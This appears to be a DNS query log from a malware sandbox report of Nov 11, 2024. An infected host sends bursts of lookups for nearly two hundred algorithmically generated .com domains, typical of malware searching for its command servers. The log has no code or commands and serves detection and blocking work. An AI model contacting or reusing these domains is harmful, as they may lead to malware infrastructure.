                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200860023 CET192.168.2.81.1.1.10xbef0Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201014042 CET192.168.2.81.1.1.10x520Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201174021 CET192.168.2.81.1.1.10x65e5Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201335907 CET192.168.2.81.1.1.10xb571Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.216240883 CET192.168.2.81.1.1.10x94c4Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.217331886 CET192.168.2.81.1.1.10x510bStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.217518091 CET192.168.2.81.1.1.10xddceStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.234724045 CET192.168.2.81.1.1.10x4f42Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.790111065 CET192.168.2.81.1.1.10xb55bStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.791604996 CET192.168.2.81.1.1.10x353eStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.795953035 CET192.168.2.81.1.1.10xf59cStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.802401066 CET192.168.2.81.1.1.10x1a6fStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.805757046 CET192.168.2.81.1.1.10x500bStandard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.808204889 CET192.168.2.81.1.1.10x55b6Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.821482897 CET192.168.2.81.1.1.10x4e04Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.823618889 CET192.168.2.81.1.1.10x6fd1Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.830655098 CET192.168.2.81.1.1.10x19c6Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.848129034 CET192.168.2.81.1.1.10xe6c6Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.866398096 CET192.168.2.81.1.1.10xa0a0Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.881484985 CET192.168.2.81.1.1.10x5fb5Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.882030964 CET192.168.2.81.1.1.10x849bStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.187401056 CET192.168.2.81.1.1.10x804bStandard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.189834118 CET192.168.2.81.1.1.10xe8b3Standard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.190078974 CET192.168.2.81.1.1.10x3898Standard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.191699028 CET192.168.2.81.1.1.10xd1d8Standard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.192392111 CET192.168.2.81.1.1.10xe593Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.194124937 CET192.168.2.81.1.1.10xcba8Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.195101976 CET192.168.2.81.1.1.10x505Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.195516109 CET192.168.2.81.1.1.10x959fStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.198009968 CET192.168.2.81.1.1.10x9249Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.198632002 CET192.168.2.81.1.1.10xf8c7Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.199214935 CET192.168.2.81.1.1.10xff6cStandard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.200292110 CET192.168.2.81.1.1.10x8e29Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.200767040 CET192.168.2.81.1.1.10xf27fStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.204741001 CET192.168.2.81.1.1.10xb4b6Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.207783937 CET192.168.2.81.1.1.10xae26Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.208051920 CET192.168.2.81.1.1.10xf0e2Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.208235979 CET192.168.2.81.1.1.10x1aa2Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.231245041 CET192.168.2.81.1.1.10xf3a0Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.233154058 CET192.168.2.81.1.1.10x5413Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.234607935 CET192.168.2.81.1.1.10x4b68Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.234817028 CET192.168.2.81.1.1.10x11e6Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.234993935 CET192.168.2.81.1.1.10xe158Standard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235141039 CET192.168.2.81.1.1.10x8e2bStandard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235272884 CET192.168.2.81.1.1.10x9453Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235409021 CET192.168.2.81.1.1.10x5202Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235543013 CET192.168.2.81.1.1.10x8d45Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235677958 CET192.168.2.81.1.1.10x81a9Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235810995 CET192.168.2.81.1.1.10x391dStandard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.235949993 CET192.168.2.81.1.1.10x1b21Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.236594915 CET192.168.2.81.1.1.10xba96Standard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.238607883 CET192.168.2.81.1.1.10x8be5Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.238785028 CET192.168.2.81.1.1.10x60f7Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.239001989 CET192.168.2.81.1.1.10xcac7Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.239815950 CET192.168.2.81.1.1.10x6889Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.253535986 CET192.168.2.81.1.1.10x8a62Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.257081032 CET192.168.2.81.1.1.10xaf07Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.257554054 CET192.168.2.81.1.1.10xa9e4Standard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.257792950 CET192.168.2.81.1.1.10x5285Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.257955074 CET192.168.2.81.1.1.10xafe7Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.258120060 CET192.168.2.81.1.1.10xd619Standard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.258771896 CET192.168.2.81.1.1.10x3140Standard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.259125948 CET192.168.2.81.1.1.10x6115Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.259614944 CET192.168.2.81.1.1.10x445fStandard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.259789944 CET192.168.2.81.1.1.10x89faStandard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.259941101 CET192.168.2.81.1.1.10xe8caStandard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.776487112 CET192.168.2.81.1.1.10x8fb0Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.781151056 CET192.168.2.81.1.1.10x8c6cStandard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.784004927 CET192.168.2.81.1.1.10x6a65Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.784588099 CET192.168.2.81.1.1.10x6a2dStandard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.794795036 CET192.168.2.81.1.1.10x826bStandard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.807334900 CET192.168.2.81.1.1.10x7107Standard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.807914019 CET192.168.2.81.1.1.10xac03Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.808070898 CET192.168.2.81.1.1.10xdc0dStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.820285082 CET192.168.2.81.1.1.10xf4f7Standard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.834007978 CET192.168.2.81.1.1.10xefa2Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.834888935 CET192.168.2.81.1.1.10xd3e3Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.835551977 CET192.168.2.81.1.1.10x2b64Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.839283943 CET192.168.2.81.1.1.10x3ed1Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.840733051 CET192.168.2.81.1.1.10x16a8Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.842184067 CET192.168.2.81.1.1.10x5ba5Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.844080925 CET192.168.2.81.1.1.10x378aStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.845201015 CET192.168.2.81.1.1.10x5605Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.846118927 CET192.168.2.81.1.1.10xb84fStandard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.848443985 CET192.168.2.81.1.1.10xf857Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.848923922 CET192.168.2.81.1.1.10x9b17Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.850344896 CET192.168.2.81.1.1.10x5794Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.853879929 CET192.168.2.81.1.1.10x391Standard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.871943951 CET192.168.2.81.1.1.10xc8c8Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.875507116 CET192.168.2.81.1.1.10xdf61Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.877295017 CET192.168.2.81.1.1.10x8740Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.879067898 CET192.168.2.81.1.1.10x9e92Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.885425091 CET192.168.2.81.1.1.10x2f14Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.887218952 CET192.168.2.81.1.1.10xcb97Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.892112017 CET192.168.2.81.1.1.10xf094Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.892281055 CET192.168.2.81.1.1.10xf739Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.893557072 CET192.168.2.81.1.1.10x5fbfStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.893851042 CET192.168.2.81.1.1.10x9ea9Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.896544933 CET192.168.2.81.1.1.10x7353Standard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.896743059 CET192.168.2.81.1.1.10x55e0Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.900238991 CET192.168.2.81.1.1.10xf5ecStandard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.900687933 CET192.168.2.81.1.1.10x8fbfStandard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.901623964 CET192.168.2.81.1.1.10x87a2Standard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.902024031 CET192.168.2.81.1.1.10x7de2Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.916573048 CET192.168.2.81.1.1.10x7b39Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917130947 CET192.168.2.81.1.1.10x6d95Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917305946 CET192.168.2.81.1.1.10xb06dStandard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917447090 CET192.168.2.81.1.1.10xa51aStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917582035 CET192.168.2.81.1.1.10x818dStandard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917731047 CET192.168.2.81.1.1.10x8fd1Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917865038 CET192.168.2.81.1.1.10xd2c7Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.921768904 CET192.168.2.81.1.1.10xc0f2Standard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.921964884 CET192.168.2.81.1.1.10x344Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922192097 CET192.168.2.81.1.1.10x3aStandard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922339916 CET192.168.2.81.1.1.10x95e4Standard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922532082 CET192.168.2.81.1.1.10x9e4fStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922674894 CET192.168.2.81.1.1.10xb4efStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922821045 CET192.168.2.81.1.1.10xc1baStandard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922965050 CET192.168.2.81.1.1.10xea1Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923110008 CET192.168.2.81.1.1.10x4bffStandard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923284054 CET192.168.2.81.1.1.10x2348Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923325062 CET192.168.2.81.1.1.10x8db3Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923454046 CET192.168.2.81.1.1.10x7a6bStandard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.926603079 CET192.168.2.81.1.1.10x51Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927000046 CET192.168.2.81.1.1.10xede5Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927174091 CET192.168.2.81.1.1.10x9297Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927357912 CET192.168.2.81.1.1.10x42c1Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927537918 CET192.168.2.81.1.1.10x664dStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927704096 CET192.168.2.81.1.1.10x8551Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.929182053 CET192.168.2.81.1.1.10x533eStandard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.352845907 CET192.168.2.81.1.1.10xe5c2Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.438169956 CET192.168.2.81.1.1.10xd1fbStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.438550949 CET192.168.2.81.1.1.10x38baStandard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.439269066 CET192.168.2.81.1.1.10x3237Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.440757036 CET192.168.2.81.1.1.10x18efStandard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.440814018 CET192.168.2.81.1.1.10x9cecStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.441157103 CET192.168.2.81.1.1.10xfbe9Standard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.441665888 CET192.168.2.81.1.1.10xafd5Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.442045927 CET192.168.2.81.1.1.10x4786Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.445207119 CET192.168.2.81.1.1.10x19dStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.446858883 CET192.168.2.81.1.1.10x138aStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.449376106 CET192.168.2.81.1.1.10x7e56Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.451149940 CET192.168.2.81.1.1.10xba1fStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.469146013 CET192.168.2.81.1.1.10x3237Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.494211912 CET192.168.2.81.1.1.10xe0f1Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.494399071 CET192.168.2.81.1.1.10xfa97Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495002031 CET192.168.2.81.1.1.10xf7fdStandard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495157003 CET192.168.2.81.1.1.10x9f5Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495964050 CET192.168.2.81.1.1.10x8bfbStandard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.507450104 CET192.168.2.81.1.1.10x6a3dStandard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.508481026 CET192.168.2.81.1.1.10x1036Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.508667946 CET192.168.2.81.1.1.10x5730Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.521083117 CET192.168.2.81.1.1.10x1c3cStandard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.525666952 CET192.168.2.81.1.1.10x502dStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.587269068 CET192.168.2.81.1.1.10x106bStandard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.587917089 CET192.168.2.81.1.1.10xb2e4Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.588097095 CET192.168.2.81.1.1.10xe92Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.589493990 CET192.168.2.81.1.1.10x19efStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.589884043 CET192.168.2.81.1.1.10xdc6aStandard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.591134071 CET192.168.2.81.1.1.10xf0bStandard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.591998100 CET192.168.2.81.1.1.10xdd56Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.592411995 CET192.168.2.81.1.1.10x1688Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.602241993 CET192.168.2.81.1.1.10x8807Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.603147984 CET192.168.2.81.1.1.10x59c8Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623301029 CET192.168.2.81.1.1.10x3f76Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623369932 CET192.168.2.81.1.1.10xfafdStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623533010 CET192.168.2.81.1.1.10x8ffStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623577118 CET192.168.2.81.1.1.10xa065Standard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.623707056 CET192.168.2.81.1.1.10x610fStandard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624531031 CET192.168.2.81.1.1.10x6c9eStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624706030 CET192.168.2.81.1.1.10x8ff2Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624861002 CET192.168.2.81.1.1.10xf2e2Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.624995947 CET192.168.2.81.1.1.10xa875Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625155926 CET192.168.2.81.1.1.10x4575Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625315905 CET192.168.2.81.1.1.10x47bfStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625472069 CET192.168.2.81.1.1.10x6001Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625632048 CET192.168.2.81.1.1.10xdc91Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625782013 CET192.168.2.81.1.1.10x161eStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.625936985 CET192.168.2.81.1.1.10xd6d9Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.626127005 CET192.168.2.81.1.1.10x42e6Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.636260033 CET192.168.2.81.1.1.10x1eaStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.641238928 CET192.168.2.81.1.1.10x26e8Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.642169952 CET192.168.2.81.1.1.10x9dbaStandard query (0)puvydov.comA (IP address)IN (0x0001)false
